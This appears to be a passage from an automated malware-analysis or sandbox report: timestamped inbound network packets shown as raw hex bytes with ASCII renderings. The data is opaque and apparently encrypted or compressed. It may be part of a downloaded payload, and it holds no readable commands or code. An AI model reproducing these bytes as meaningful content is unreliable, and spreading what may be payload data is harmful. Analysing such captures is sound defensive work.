2023-09-07 07:31:08 UTC	230	IN	Data Raw: bc 74 60 82 70 4e 95 73 ea 61 a1 5d b9 57 1a 23 4e 6d 23 99 72 d0 ee eb 95 72 11 60 18 f6 91 83 e0 02 88 5e 5f cc 0d 36 07 c6 3a bc 78 bd fa f3 b4 08 11 e5 2e b2 98 4d 39 65 e4 3f 93 fd fe 41 ee 2f 43 61 0b 5b 5d 3b ae 46 23 51 9c 46 3e b3 7c d1 16 2f 72 2f a8 c2 69 3a b1 11 45 37 e6 9d ee 84 07 2f 3c 7e 52 02 a9 f1 ed 9b 96 f6 d0 9c 94 04 79 53 75 68 e1 92 37 2b 82 b1 d0 38 43 bf 6b fa 7f e4 42 df 40 92 5b 8b bc a5 97 d9 42 6d 7d 15 50 eb d1 f5 3c 2e f1 69 e8 a7 51 af f8 25 d9 63 7a ce 0b 1e e4 cb d6 e2 b8 93 53 c7 8b 32 bf b5 5e 46 e4 64 8f f1 a6 0d a7 4a ac ff 0e 0e 7e a2 3e 4d 8d 57 8c bb de 2e 6e ef ff 6c 0a 02 23 77 2f 09 ca 78 bc 3c 32 e6 73 58 e5 af 83 78 09 0f 44 92 0b d4 18 f2 11 4e 36 69 c7 13 e2 40 7e 05 c5 3a b4 f3 e4 f8 e8 e2 3b 58 b2 db 5b Data Ascii: t`pNsa]W#Nm#rr`^_6:x.M9e?A/Ca[];F#QF>\|/r/i:E7/<~RySuh7+8CkB@[Bm}P<.iQ%czS2^FdJ~>MW.nl#w/x<2sXxDN6i@~:;X[
2023-09-07 07:31:08 UTC	232	IN	Data Raw: be 28 78 6d 8b 41 6a fc 14 76 67 4f c4 08 99 f7 29 61 9c 2f 44 fb 20 2c ce ec 45 ee 2b e4 d7 fb 10 d3 42 ae bc ec 52 8e 26 35 f0 ea 45 4c 17 2d 71 d9 07 c8 be f5 46 59 be bf 71 e1 09 ea 13 5b 29 6c 0c 41 09 3c a3 a4 6c ed 6d 13 be 35 29 bd ce 86 c8 d4 b8 13 0b 0d 7c 27 26 36 69 41 f6 40 d7 95 fb b3 d6 5e 3b 9f 1d 94 71 f4 98 25 c3 3b d6 21 3f 73 88 0d 0a 4a 65 13 3b c7 dc 76 76 28 3d 26 51 9c 12 01 b4 6f b6 96 45 9f cd a5 78 7b 08 a5 64 bc e2 07 b2 fd 53 8b b3 6b b4 89 bb 01 ee ff 01 0a 07 ff 9b 3c c7 5d 84 f6 f8 fd 0e a4 e1 d1 d0 80 0b d2 9c f6 33 70 e7 23 69 70 1d 71 79 3d d1 14 d8 f1 25 9e 05 8a f7 12 57 36 77 18 be 74 c2 d7 7c c6 b7 93 36 f2 ad ac 0b 24 79 58 30 88 37 86 34 0b b1 20 53 8f 5f 8e 49 12 b1 37 2c 0c a6 58 02 81 0f 50 39 ba e1 a6 ca 0f a0 Data Ascii: (xmAjvgO)a/D ,E+BR&5EL-qFYq[)lA<lm5)\|'&6iA@^;q%;!?sJe;vv(=&QoEx{dSk<]3p#ipqy=%W6wt\|6$yX074 S_I7,XP9
2023-09-07 07:31:08 UTC	233	IN	Data Raw: 46 39 04 5d 19 b6 8c 73 55 97 35 a9 0c 34 9d 76 14 c7 90 be db 70 4a 10 cc 4b d1 c9 d0 a2 ef a7 14 5d ad 56 5a a5 a4 a3 53 d5 2a 98 de f2 0e 9f 5d 3a aa 8a 50 05 49 9f 27 97 f1 03 ad da 09 14 aa f1 84 3a ae ca f3 e7 9c fc 99 4a e0 1f 80 65 e7 56 95 38 31 79 d7 95 d7 12 97 ca 3c fd 25 48 cc 4d ae 75 d9 59 5f ac af 75 d2 17 db 02 c3 14 56 e5 26 15 12 a5 d4 bf 91 d3 23 4c 80 70 7e 3c f5 66 a8 25 e4 78 ac d4 a8 7e 2f 7d 4b 5a a0 71 28 fa 90 bb 29 57 13 d4 d7 d2 dc 4f 8f 86 34 52 10 a1 a8 9b d8 4a 59 47 44 d9 db 55 8d 3b f2 02 38 5c 94 5e 7f dc 4a 3b fc c7 3b 13 ff 54 fc 58 c5 34 c7 32 06 52 dd 44 fb 51 15 3d cc 3e fe 01 00 e7 43 6b bd 9e 70 68 4f 2f 38 a6 ed 19 cb 09 c8 3c fc 1f cf b1 89 f3 13 3f 8d 0b 9c 32 10 b9 a9 ed b7 7c d8 86 52 59 ef 73 17 17 43 8f 96 Data Ascii: F9]sU54vpJK]VZS*]:PI':JeV81y<%HMuY_uV&#Lp~<f%x~/}KZq()WO4RJYGDU;8\^J;;TX42RDQ=>CkphO/8<?2\|RYsC
2023-09-07 07:31:08 UTC	234	IN	Data Raw: 28 ab 1c c2 91 4b 16 39 53 f0 c1 f3 f9 f4 dc fb 18 86 b9 08 0a 15 39 37 d1 c7 ed 34 fe fb ab 2e df 60 19 34 d1 7e 13 f7 de 45 87 d3 94 84 3c 6b 91 ba b2 0f c3 b7 d1 6d d4 e9 e6 fc 89 66 03 fb ef 4e f7 71 20 3c 06 86 45 1c 94 09 aa 9b 62 62 3e 76 f9 63 78 2b 40 fc 54 2b 83 e3 1d 6f dc e6 9e 0c fd fc 1f 98 f0 d9 4b af d3 94 02 61 a8 b6 72 38 be 55 54 b2 4e 3c 39 59 79 cc 4c 57 a4 69 de e5 d3 9a 4e 18 6b 5f 9e 11 8f 20 26 0f 21 1e 50 6d a8 27 b4 8a 5f 88 82 96 8c f1 50 bf 93 3b 54 89 ef dc 08 f9 8c fb 28 60 14 60 47 8a 19 6b 83 6c 83 b1 48 dd 66 1e 87 41 b3 0b 04 3c 08 c2 bc cf f4 a1 30 90 2d 61 65 f0 b8 6d 89 ab c8 60 e0 c1 a4 c0 4d 2b 59 f7 ae 10 1a 61 3a 4c e2 3c 39 0c 11 e1 a8 34 6e 16 3e 02 43 c1 71 62 52 f9 99 77 d9 b4 bc b4 f3 6c fa 1c c1 50 27 fb 92 Data Ascii: (K9S974.`4~E<kmfNq <Ebb>vcx+@T+oKar8UTN<9YyLWiNk_ &!Pm'_P;T(``GklHfA<0-aem`M+Ya:L<94n>CqbRwlP'
2023-09-07 07:31:08 UTC	235	IN	Data Raw: 2f e3 0d ed b5 cd 96 3b e8 19 bf 82 fe 3e c5 48 08 1f 07 14 19 c0 a7 4e 20 a0 0c 98 d0 94 02 ce 8e 52 16 96 c2 af 6c 38 f4 32 62 f5 93 75 ce cb ca b3 f2 a9 e5 f7 c4 47 5d c9 e1 f5 c0 32 54 08 42 cb 60 59 41 3c fe e5 bd 9a 9b 9a ec 09 15 1a 52 ff ec ae 66 d3 66 1b a3 fc f6 48 7d 75 3c c5 ca 4a e9 fa db f0 7b a5 c6 5c 63 f3 6b 40 9f e4 cb 14 32 39 1d 5f 02 be fe 0c 65 ea 6a 65 7c cd 8e da c5 78 d3 c0 cb 02 87 ad 7f 93 a8 81 88 ba 89 fe de 99 b9 df 9c 07 92 27 63 0f a8 d5 09 3b 7b bb bf 06 2e d0 e4 c7 f3 53 36 51 e8 b6 0c e6 ed ec 19 a9 5a a8 da 36 2e 23 5a 69 d1 fc 5f e5 0c b9 25 3e ae 47 38 25 4c a9 af f7 b7 d2 b7 d3 54 96 ca ab 05 f0 c3 70 b4 90 80 94 e4 7f 23 75 69 0c 8f 06 17 06 d7 76 e9 60 ce bf 29 ad bf 13 10 12 8c 31 ac 74 fd f0 55 ad d8 06 7b b1 6a Data Ascii: /;>HN Rl82buG]2TB`YA<RffH}u<J{\ck@29_eje\|x'c;{.S6QZ6.#Zi_%>G8%LTp#uiv`)1tU{j
2023-09-07 07:31:08 UTC	237	IN	Data Raw: 08 b1 22 51 8c 5f 8c 4b 11 b1 35 6f 4e e7 5a ff 7d f0 52 c4 46 1e 39 99 ff 5f 6a ee df ec 0b ec e6 ff ae 77 ad 18 83 6c 14 41 d5 e1 a9 05 a2 e3 85 03 7f 44 f0 a7 10 9a 8c 83 1d 0d c8 ae 8f da 9d ea 41 62 4c 40 05 e6 fa 61 5a 84 4d 08 49 84 3d fe 0f 99 31 ab ed 5c 63 06 37 63 81 44 65 4a 73 4e e7 79 0e cc 45 2f 08 54 c7 e0 aa 28 74 75 41 89 60 7f 8d b3 95 8e 17 9c a1 a0 44 aa 1a de b3 90 23 64 8f 2d ee 16 68 8f 11 9d e5 0b 91 7e 1d ff 88 a3 a2 31 0d cb fa 3b 3a 41 85 40 fa aa e8 68 11 c4 0b 9d 98 6c 1c 4a e4 1e b7 d3 fe 61 ca 01 43 47 21 77 5d 1d 85 6b 23 77 b6 6a 3e 92 56 fe 16 0e 57 00 a8 e3 4c 14 b1 30 61 1e e6 bd c9 ad 07 0f 1b 56 52 21 8f da ed b9 b0 dc d0 bd b6 2d 79 4d 56 4e e1 8c 14 0c 82 ae f0 1c 43 e3 0a 9f 7f 06 a2 03 40 71 bb 57 bc 41 76 04 42 Data Ascii: "Q_K5oNZ}RF9_jwlADAbL@aZMI=1\c7cDeJsNyE/T(tuA`D#d-h~1;:A@hlJaCG!w]k#wj>VWL0aVR!-yMVNC@qWAvB
2023-09-07 07:31:08 UTC	238	IN	Data Raw: 6a 5f 0c cc e3 5b f4 7c ef c7 46 49 30 6f 83 39 58 8b a6 0e ac cd e8 a2 6f 4d 4f 17 2b 0f 5e 3d bd da fe 5f eb d6 08 27 60 10 22 58 64 0a cc 9a b5 c5 69 50 0f a6 4b 8b 4f a8 9d cd 9f 80 a1 51 fa 05 75 52 f2 64 a0 86 4f c3 75 11 8d c6 6d bf 7c 97 3d a1 b8 bb ca 6c 50 4a 9a 20 a7 b8 5e d2 70 97 75 87 1c 7c 86 01 a5 f7 10 d0 b7 0b 6e f3 4c d8 87 99 78 b0 95 09 e0 84 98 b9 31 fc 66 00 de 97 63 d5 be 02 df d6 34 15 ba 14 d1 1d 97 01 ea 2a 42 43 57 14 52 ce 09 db f0 c7 5e a1 17 10 b7 96 07 4f 2e fa 46 cb 20 b1 71 e5 0d ed 13 5f 2d 6b 0c 46 0e 39 a3 a3 6b e8 6d 14 b9 30 29 ba c9 83 c8 d3 bf 16 0b 0a 7b 22 26 31 6e 44 f6 47 d0 90 fb b4 d1 5b 3b 98 1a 91 71 f3 9f 20 c3 3c d1 24 3f 74 8f 08 0a 4d 62 16 3b c0 db 73 76 2f 3a 23 51 9b 15 04 b4 68 b1 93 45 98 ca a0 78 Data Ascii: j_[\|FI0o9XoMO+^=_'`"XdiPKOQuRdOum\|=lPJ ^pu\|nLx1fc4*BCWR^O.F q_-kF9km0){"&1nDG[;q <$?tMb;sv/:#QhEx
2023-09-07 07:31:08 UTC	239	IN	Data Raw: 36 69 15 38 00 44 c2 77 60 55 fa 9f 75 de b7 ba b6 f4 6f fc 1e c6 53 21 f9 95 4f 12 05 ba f5 ab 59 86 5e 3e 53 6c 60 af de 00 50 0e 28 95 b3 0a 34 db 66 0c 3a f9 7a b0 22 41 45 58 09 3b c2 7e dd 24 00 60 ef a7 b2 84 06 60 d2 f1 51 15 33 0a c8 34 f8 a4 62 eb 5c 1c 30 96 41 5c e9 d6 de 52 0e 33 0c 6d 3c a2 45 9b 83 1e 0c c1 f6 90 9b 78 ba c5 fb a0 e5 4a 73 8e a9 6b ca 54 f0 c8 62 8b e8 3b 6f 43 27 8c b5 b4 51 be 2e e4 cb 4f 10 d6 70 ac 52 ab a6 59 5b 5e af 29 d5 ff 84 03 f1 40 81 c3 ea 77 ac f9 49 62 db 6b f1 fe 51 26 09 e9 56 0d 84 c7 52 80 f3 1a 60 f3 99 b7 1c 10 80 98 1b 59 95 c5 cd 76 d7 68 2b 1d 97 37 c0 f2 25 b5 30 42 ae 88 25 56 5f 51 53 7a d2 ea 27 0d c3 e9 aa ea 26 e8 ee aa d4 42 6d dc 23 b1 7c 7f 7e c1 09 69 a8 d8 18 77 ac 29 54 71 2f 80 b7 55 a0 Data Ascii: 6i8Dw`UuoS!OY^>Sl`P(4f:z"AEX;~$``Q34b\0A\R3m<ExJskTb;oC'Q.OpRY[^)@wIbkQ&VR`Yvh+7%0B%V_QSz'&Bm#\|~iw)Tq/U
2023-09-07 07:31:08 UTC	240	IN	Data Raw: f9 c1 76 16 9f d8 bf d6 52 a9 52 ae ac 9a ce ac 74 eb 0f 55 ad ce f9 7b b1 7c b2 11 c0 b3 5d a6 f4 67 2e e5 83 03 02 3a 7b f0 18 00 12 ba 5d a2 35 02 0c 02 00 51 8a a4 36 94 bf b5 1c e6 1d 1c b3 7f 3f fa ab 0a c2 21 b4 d6 eb c1 0c e9 61 f1 d9 b7 62 a3 ba da c9 4a 38 46 01 45 a2 f7 a4 68 90 f4 28 53 2e 7b 74 41 e9 0a c6 77 3a 14 37 18 28 42 e3 c2 91 a2 e9 39 53 19 3e f3 f9 1d 23 fb 18 6f 46 08 0a fc c6 37 d1 2e 12 34 fe 12 54 2e df 89 e6 34 d1 97 ec f7 de ac 78 d3 94 6d c3 6b 91 53 4d 0f c3 5e 2e a2 19 01 19 12 65 8c fc 14 02 a5 08 81 ce d0 f9 74 b4 f3 6b f1 52 6c 9d 9a c6 81 06 9b 80 dc 00 04 ac dc 83 1b e5 98 dc 1e 66 fb fd 04 e7 6f f0 9f 0d e6 d3 93 05 69 a8 b1 75 30 be 52 53 ba 4e 3b 3e 51 79 c8 48 5c a4 6d da e9 d3 9e 4a 14 6b 5b 9a 1d 8f 24 22 03 21 Data Ascii: vRRtU{\|]g.:{]5Q6?!abJ8FEh(S.{tAw:7(B9S>#oF7.4T.4xmkSM^.etkRlfoiu0RSN;>QyH\mJk[$"!
2023-09-07 07:31:08 UTC	241	IN	Data Raw: 61 e8 93 31 22 8b b0 d6 31 4a fe 2d b3 76 1b ba 28 49 6d a3 7c b5 5a 6f 2e 4b 92 85 e2 59 14 29 02 75 d1 09 9e 1e 58 a9 58 0e da 21 94 8c 31 f3 e9 12 34 2e 15 4e 6c ab 30 7d cd 47 42 a8 b9 1c 93 79 0e 5e fa 51 b5 54 08 f8 f1 86 55 c8 b2 75 a0 7a 44 26 d9 98 10 07 9b fc fd db 80 d9 f6 32 8f 4a c3 ca 11 85 a7 1c 56 7b 87 f6 Data Ascii: a1"1J-v(Im\|Zo.KY)uXX!14.Nl0}GBy^QTUuzD&2JV{
2023-09-07 07:31:08 UTC	242	IN	Data Raw: f0 bb 6d f4 2b e7 0d ee b1 c9 96 38 ec 1d bf c0 bb 7b c5 b4 f3 e4 07 e8 e2 3b a7 b2 db 5b 0c 64 2b 6f 02 32 75 a9 56 6a 39 54 93 c4 0f c9 9d 09 68 8e 31 37 31 48 0d 55 1e 0c 3b bb a6 32 1e 09 3b c9 ab f4 b9 30 9f a5 ba c7 01 19 46 61 64 66 17 f2 ea e6 a9 04 13 76 b2 2b 99 36 b8 11 09 01 47 9b c3 39 31 b1 16 06 20 0b 84 59 3d a7 23 0f 90 bb 9f 18 30 ef 32 c5 e6 a4 02 42 05 f7 65 16 91 3c 7c 31 75 fb c5 84 28 e1 cb fe 7c 8c 7f 6f 53 a0 88 46 72 df de 65 42 fe 9c fb 69 06 63 f3 53 f4 09 f8 bf a3 bf 05 2a d4 e4 c4 f7 57 36 d2 6c a1 0c 1a 16 cd 19 55 a1 89 da ca d5 02 5a 95 2a dd 5f 19 f7 98 25 c2 55 66 38 d9 b7 88 af 0b 4c f3 b7 30 b0 b3 ca a8 01 f4 c3 73 b0 94 80 8e fe 78 23 34 28 06 8f 47 56 0c d7 47 d8 68 ce bf 29 ad bf 52 51 53 8c ce 53 8b fd 16 b3 56 d8 Data Ascii: m+8{;[d+o2uVj9Th171HU;2;0Fadfv+6G91 Y=#02Be<\|1u(\|oSFreBicSW6lUZ_%Uf8L0sx#4(GVGh)RQSSV
2023-09-07 07:31:08 UTC	243	IN	Data Raw: 74 18 84 c9 f7 9e 22 ae 73 70 8c b4 ee 9e 35 da fb 8b 5a 19 9b 0a 52 3b b9 e1 39 66 00 a0 6a cd fc 3a 0b ec e6 2f ee 68 b2 cd 7c 93 eb be 2a 1e 56 fa 5d 7d 1b ee 80 44 f0 77 ef 9a 8c 53 e2 0d c8 7e 70 da 9d 3a be 62 4c 90 fa e6 fa b1 a5 84 4d d8 b6 84 3d 2e f0 99 31 7b 12 5c 63 d6 c8 63 81 94 9a 4a 73 9e 18 79 0e 1c ba 2f 08 84 87 e0 aa f8 74 bf 89 56 60 97 6b 51 95 66 f0 7f a1 49 a3 4e 1a 33 58 79 23 92 7a d9 ee e0 9d 7b 11 6b 10 ff 91 88 e8 0b 88 55 57 c5 0d 3d 0f cf 3a b7 70 b4 fa f8 bc 01 11 ee 26 bb 98 46 31 6c e4 34 9b f4 fe 4a e6 26 43 6a 03 52 5d 30 a6 4f 23 5a 94 4f 3e b8 74 d8 16 24 7a 26 a8 c9 61 33 b1 1a 4d 3e e6 96 e6 8d 07 24 34 77 52 09 a1 f8 ed 90 9e ff d0 94 9f 0e 79 5b 7e 62 e1 9a 3c 21 82 b9 db 32 43 f7 20 b0 7f 12 b7 2b 40 64 ae 7f bc Data Ascii: t"sp5ZR;9fj:/h\|*V]}DwS~p:bLM=.1{\ccJsy/tV`kQfIN3Xy#z{kUW=:p&F1l4J&CjR]0O#ZO>t$z&a3M>$4wRy[~b<!2C +@d
2023-09-07 07:31:08 UTC	244	IN	Data Raw: c8 0f e0 3a 45 7a 0c e6 cb 7e f4 69 c6 e3 46 5c 19 44 83 2d 72 a1 a6 1a 87 e4 e8 b6 7b 65 4f 00 3f 27 5e 2b a8 f5 fe 4e fe f8 08 36 76 3d 22 48 73 26 cc 8b a0 d3 69 49 14 b8 4b 93 55 b5 9d da 86 9c a1 47 e2 1e 75 06 a4 3e a0 6c a6 26 75 fa 67 20 6d 53 96 70 3d 4c 53 53 ca 82 bc a3 da cf 4a 52 a1 3d 9e 7b 8a 77 f3 91 79 f0 55 19 ef 22 46 e4 91 00 be 28 78 6d 8b 41 6a fc 14 76 67 4f c4 08 99 f7 29 61 9c 2f 44 fb 20 2c ce ec 45 ee 2b e4 68 fb 10 d3 bd ae bc ec ad 8e 26 35 0f ea 45 4c e8 93 cf 67 47 36 40 0b 46 a7 40 41 71 1f f7 14 13 a5 d7 92 0c bc f4 4f a3 59 91 d1 6d ee 43 09 29 40 33 ba c8 08 64 26 0b d1 a0 12 26 ea b5 74 f6 9c 0b a0 fb 6f 0a 6b 3b 3a b8 be 71 f6 9a 26 c3 39 d4 22 3f 1e e5 15 0a 96 b9 26 3b 1b 00 43 76 f4 e1 13 51 0b 85 27 b4 6d b4 95 45 Data Ascii: :Ez~iF\D-r{eO?'^+N6v="Hs&iIKUGu>l&ug mSp=LSSJR={wyU"F(xmAjvgO)a/D ,E+h&5ELgG6@F@AqOYmC)@3d&&tok;:q&9"?&;CvQ'mE
2023-09-07 07:31:08 UTC	245	IN	Data Raw: 08 11 e2 cc 57 70 15 f0 cb 78 c2 bf ab 69 fa 57 be e2 b7 c4 cb d0 6f f9 18 c1 53 24 ff 92 4f 47 53 aa f5 63 92 ba 5e 8f e1 5f 60 aa d8 07 50 0b 2e 92 b3 43 7c cb 66 c1 f7 c2 7a 7d ef 7a 45 95 c4 00 c2 be 1d 1c 00 60 ef f5 b2 7b f9 9f d2 0e ae ea 33 df 1d c7 f8 96 50 2f 5c 2e 02 52 01 17 a2 1d 21 ad f1 cc f3 92 c3 5d ba 29 31 f7 f3 f3 c4 54 64 4a 88 01 04 92 d7 8e 8c bc 9b af 35 66 c2 0c 9d b9 da ff 90 71 15 48 4a 86 63 7a d1 d6 f9 8b ef e4 42 68 ad 99 94 9d a4 47 b6 95 2a ff 84 b6 0e 40 81 76 aa 77 ac 4c 49 a6 19 be f1 1c 8e fc 09 0a 89 d6 84 23 b2 ea f3 f2 85 e2 99 44 ee 13 80 6b e9 5a 95 36 3f 75 d7 9b d9 1e 97 c4 32 f1 25 46 c2 41 ae 7b d7 55 5f a2 a1 79 d2 19 d5 0e c3 1a 58 e9 26 1b 1c a9 d4 b1 9f df 23 42 8e 7c 7e 32 fb 6a a8 2b ea 74 ac da a6 72 2f Data Ascii: WpxiWoS$OGSc^_`P.C\|fz}zE`{3P/\.R!])1TdJ5fqHJczBhG*@vwLI#DkZ6?u2%FA{U_yX&#B\|~2j+tr/
2023-09-07 07:31:08 UTC	246	IN	Data Raw: 02 9f 06 1a 08 c7 76 e4 6e de bf 24 a3 af 52 5c 5d 9c ce 5e 85 ed 0f a7 5c c8 f9 89 40 7a b2 e3 31 b5 5d 54 05 61 2e 17 72 05 02 c8 8a f6 18 f2 e3 bc 5d 50 c4 04 0c f0 f1 57 8a 56 c7 92 bf 47 ed e0 1d ee 42 79 3f 08 5a 0c c2 d3 45 d0 eb 33 fd ef 61 03 28 b1 62 51 4b dc c9 b8 c9 40 01 b7 53 f1 a4 9a 61 f2 28 a1 df 7d 74 b4 1d 10 c6 88 c5 02 37 e7 d7 54 e3 3d 6e b4 e9 c6 ac 0f 3e 4d 47 4a 23 fb 18 86 46 08 0a 15 c6 37 d1 c7 12 34 fe fb 54 2e df 60 a6 34 d1 7e 13 f7 de 45 87 d3 94 84 3c 6b 91 ba b2 0f c3 b7 d1 6d d4 e9 e6 fc 89 66 03 fb ef 4e f7 71 20 3c 06 86 45 1c 94 09 aa 9b 62 62 3e 76 f9 63 78 2b ff fc 54 2b 7c e3 1d 6f 23 e6 9e 0c 02 fc 1f 98 0f 67 f5 11 93 6b fd 9e a8 49 8d c7 be aa ab 4d 4e c3 c6 a6 79 30 b0 d7 a4 95 22 b9 d3 66 b2 44 6b a3 62 4d 8f Data Ascii: vn$R\]^\@z1]Ta.r]PWVGBy?ZE3a(bQK@Sa(}t7T=n>MGJ#F74T.`4~E<kmfNq <Ebb>vcx+T+\|o#gkIMNy0"fDkbM
2023-09-07 07:31:08 UTC	248	IN	Data Raw: fa 86 52 8b 96 1e 93 c9 d5 7d b0 2e c6 c9 fe d5 44 1c 1b 42 df 23 6d 5b 8b df 5a f9 b7 75 92 13 7b 67 14 bf 9b 4b d1 9f 07 20 58 3f c1 30 da b7 0d b2 31 65 70 2c 34 b8 8c 70 6c 3d a9 43 cd d1 db 96 b9 8a 0a 47 0e c8 63 6f b5 c2 91 c6 f1 10 cc f6 b2 e3 39 44 44 b0 40 a6 10 91 02 c2 fd 4d 19 e7 f6 a4 16 74 c3 5c 88 bb a7 8b c1 4b 87 67 61 8c 6d 65 ba d0 0d 7f 20 fe 96 a9 7d 2a bf 10 6b 0d c5 da 9d 2c 07 86 8c f3 a7 dc b5 93 0c 0a 45 a7 02 5c 1b 61 16 04 57 9c 6c aa 61 01 62 67 06 46 ce 59 5f 80 f2 3b 70 c4 c4 d5 c8 fa e1 67 55 01 54 9a d7 f8 60 cb d4 0f fe 77 28 a9 9b 08 79 3a 15 88 c7 cc ec 18 dc e3 66 58 d6 d9 f6 6f 29 53 3c 0e 06 03 e9 06 20 97 7b 59 3d 3b 63 0f 90 27 9f a6 8c 25 32 1e 3e 76 02 99 dd 24 65 ca 48 4a 7c d0 ab fb c5 74 c6 d7 cb 0e 92 ba 7f Data Ascii: R}.DB#m[Zu{gK X?01ep,4pl=CGco9DD@Mt\Kgame }*k,E\aWlabgFY_;pgUT`w(y:fXo)S< {Y=;c'%2>v$eHJ\|t
2023-09-07 07:31:08 UTC	249	IN	Data Raw: 13 1f 71 9b 1c 1f 48 76 02 2e c5 cf 67 63 2a 2e 37 44 9e 01 10 a1 6d a5 87 50 9d de b4 6d 79 1b b4 71 be f1 16 a7 ff 40 9a a6 69 a7 98 ae 03 fd ee 14 08 14 ee 8e 3e d4 4c 91 f4 eb ec 1b a6 f2 c0 c5 82 18 c3 89 f4 20 61 f2 21 7a 61 08 73 6a 2c c4 16 cb e0 30 9c 16 9b e2 10 44 27 62 1a ad 65 d7 d5 6f d7 a2 91 25 e3 b8 ae 18 35 6c 5a 23 99 22 84 27 1a a4 22 40 9e 4a 8c 5a 03 a4 35 3f 1d b3 5a 11 90 1a 52 2a ab f4 39 77 12 b5 6a 00 32 06 0b 02 0b 15 ee 99 40 f2 7c 82 f9 ab 2a 0f 44 ef 5d 11 74 ec 80 bb 0f 58 ef 65 73 7c e2 f2 37 51 70 25 62 15 be dc f2 fe fa e6 fa 61 a5 84 4d 08 b6 84 3d fe f0 99 31 ab 12 5c 63 06 88 63 81 44 65 4a 73 4e e7 79 0e cc 45 2f 08 54 78 e0 aa 28 8b 75 41 89 9f 7f 8d b3 6a 8e 17 9c 5e a0 44 aa e5 de b3 90 dc 64 8f 2d 11 16 68 8f ee Data Ascii: qHv.gc.7DmPmyq@i>L a!zasj,0D'beo%5lZ#"'"@JZ5?ZR9wj2@\|*D]tXes\|7Qp%baM=1\ccDeJsNyE/Tx(uAj^Dd-h
2023-09-07 07:31:08 UTC	250	IN	Data Raw: 19 d9 e8 ee 59 2b 42 6d 2f dc b1 7c 8c 81 c1 09 9a 57 d8 18 84 53 29 54 82 d0 80 b7 a6 5f 8c d4 06 6f 46 d5 ab ec 29 2b 2e 23 b2 73 7a cb af ec 5d 57 d9 24 b6 a6 46 ba 27 24 54 73 c5 0d 03 c6 a2 6b 5f 81 22 d7 7a 42 79 47 ec ff 54 80 a7 c5 34 bb cd 06 52 a1 bb fb 51 69 c2 cc 3e c2 fe 00 e7 c0 94 bd 9e f3 97 4f 2f bb 59 ed 19 48 f6 c8 3c 7f e0 cf b1 0a 0c 13 3f 0e f4 9c 32 93 46 a9 ed 34 83 d8 86 d1 a6 ef 73 94 e8 43 8f 15 4f f5 cb 57 5e de 5c 85 fe bb 0a 88 08 c3 82 4d 22 bd 87 56 cc 7c 56 a6 69 b6 eb c4 4b 6c aa c9 9d 25 79 e0 a1 b8 1d 62 75 b8 1a 03 a0 6c a6 a5 75 fa 67 a3 6d 53 96 f3 3d 4c 53 d0 ca 82 bc 20 9a cf 4a d1 5e 3d 9e f8 75 77 f3 12 86 f0 55 9a 10 22 46 67 6e 00 be ab 87 6d 8b c2 95 fc 14 f5 98 4f c4 8b 66 f7 29 e2 63 2f 44 78 df 2c ce 6f ba Data Ascii: Y+Bm/\|WS)T_oF)+.#sz]W$F'$Tsk_"zByGT4RQi>O/YH<?2F4sCOW^\M"V\|ViKl%ybulugmS=LS J^=uwU"FgnmOf)c/Dx,o
2023-09-07 07:31:08 UTC	251	IN	Data Raw: 2f a5 55 41 a5 55 3c 2c 4e 62 cf 5a 43 bf 6a c8 f6 c8 99 58 0b 70 5c 88 02 94 23 30 1c 3a 1d 46 7e b3 24 a2 99 44 8b 94 85 97 f2 46 ac 88 38 42 9a f4 df 1e ea 97 f8 3e 73 0f 63 51 99 02 68 95 7f 98 b2 5e ce 7d 1d 91 52 a8 08 12 2f 13 c1 aa dc ef a2 26 83 36 62 73 e3 a3 6e 9f b8 d3 63 f6 d2 bf c3 5b 38 42 f4 b8 03 01 62 2c 5f f9 3f 2f 1f 0a e2 be 27 75 15 28 11 58 c2 67 71 49 fa 8f 64 c2 b7 aa a7 e8 6f ec 0f da 53 31 e8 89 4f 02 14 a6 f5 bb 48 9a 5e 2e 42 70 60 bf cf 1c 50 1e 39 89 b3 1b 26 c6 66 19 2d e2 7a a5 35 5a 45 4d 1e 20 c2 6b ca 3f 00 34 b9 fd b2 6e ee 84 d2 1b b9 f1 33 e0 20 d0 f8 4e 8a 0f 5c f6 d8 72 01 b6 01 32 21 b8 e6 d7 f3 87 d4 46 ba 74 6e f5 f3 3e 09 6f 64 87 45 3a 04 5f 1a b5 8c 71 56 94 35 ea 4e 76 9d 8b e8 3b 90 43 27 8c 4a b4 51 be d1 Data Ascii: /UAU<,NbZCjXp\#0:F~$DF8B>scQh^}R/&6bsnc[8Bb,_?/'u(XgqIdoS1OH^.Bp`P9&f-z5ZEM k?4n3 N\r2!Ftn>odE:_qV5Nv;C'JQ
2023-09-07 07:31:08 UTC	253	IN	Data Raw: 10 32 3a 19 5b 02 bd fa 08 65 e9 3f 30 2d ce 75 21 3a 7b 28 3b 34 01 7c 56 80 90 53 7a 77 b9 72 05 21 d2 42 24 63 fb 69 dc 9c f3 53 2e f6 c7 80 40 40 fa d5 2b 1b 3b 08 a8 c9 ad 13 4d f3 1a 16 17 e6 55 a1 53 25 ca d5 d8 a5 95 2a 07 a0 19 f7 42 da c2 55 bc c7 d9 b7 52 50 0b 4c 29 48 2f af 6d 35 57 fe 0b 3c 8c 4f 6b 7f d7 18 83 dc 75 96 f3 70 06 e8 f9 28 76 16 9f 31 bf d6 52 40 52 ae ac 73 ce ac 74 02 0f 55 ad 27 f9 7b b1 95 b2 11 c0 5a 5d a6 f4 8e 2e e5 83 ea 02 3a 7b 19 18 83 91 d0 5d 5d ca 14 0c fd ff 47 8a 5b c9 82 bf 4a e3 f0 1d eb 45 63 3f 1d 4f 03 c2 c6 50 df eb 26 e8 e0 61 16 3d be 62 44 5e d3 c9 ad dc 4f 01 a2 46 fe a4 8f 74 fd 28 b4 ca 72 74 a6 0d 03 c6 90 de 1d 37 ff cc 4b e3 25 75 ab e9 de b7 10 3e 14 1d 14 23 1c fc 66 46 ef ee f5 c6 d0 35 27 12 Data Ascii: 2:[e?0-u!:{(;4\|VSzwr!B$ciS.@@+;MUS%*BURPL)H/m5W<Okup(v1R@RstU'{Z].:{]]G[JEc?OP&a=bD^OFt(rt7K%u>#fF5'
